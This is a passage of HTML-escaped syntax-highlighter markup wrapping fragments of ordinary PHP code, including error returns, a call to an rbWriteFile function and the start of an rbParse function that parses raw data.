transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-97&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-98&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;unset&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-99&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-100&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-101&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error3&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-102&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbWriteFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-103&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-104&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-105&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;default&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-106&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error1&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-107&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-108&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-109&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-110&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-111&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbParse&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-112&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$parsed&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-113&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-114&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; 